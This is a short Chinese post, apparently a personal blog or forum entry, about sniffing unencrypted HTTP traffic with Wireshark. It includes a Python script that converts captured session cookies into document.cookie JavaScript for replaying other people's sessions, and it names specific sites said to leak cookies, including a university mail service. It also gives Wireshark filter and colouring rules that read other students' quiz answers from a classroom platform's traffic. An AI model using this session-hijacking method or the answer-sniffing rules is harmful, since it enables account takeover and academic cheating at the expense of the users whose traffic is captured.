wireshark挂着,抓抓空气中的数据。
写了个脚本利用抓到的cookie。
大概长这样:
def cookie_to_js(s):
res = ''
a=s.split(';')
for x in a:
if '=' in x:
res+='document.cookie="%s";'%(x)
return res
print(cookie_to_js('a=b;c=d;'))
有其他好用的工具的话就见笑了,求推荐。
http://apilive.zhihu.com/apilive 这个websocket好像会被客户端访问,没有用https,可以抓到cookie。
http://music.163.com/ 这个也是。
http://mail.tsinghua.edu.cn/ 也是。
…
learn以及info没有成功。(ps, 后来成功了)
(感觉我需要一个浏览器插件,禁止所有的带cookie的http出流量。
另外雨课堂:
http and http.request.uri contains "answer_lesson_problem"
这个规则可以过滤出答题的包。
配合下面的染色规则可以直观得到每个包的答案。
@D@tcp contains "\"result\":\"D\""@[65535,65535,65535][65535,32896,0]
@C@tcp contains "\"result\":\"C\""@[65535,65535,65535][32896,0,32896]
@B@tcp contains "\"result\":\"B\""@[65535,65535,65535][65535,0,0]
@A@tcp contains "\"result\":\"A\""@[65535,65535,65535][0,0,65535]
另外,想用python实时处理抓到的流应该用什么库啊?(pypcap好像不行)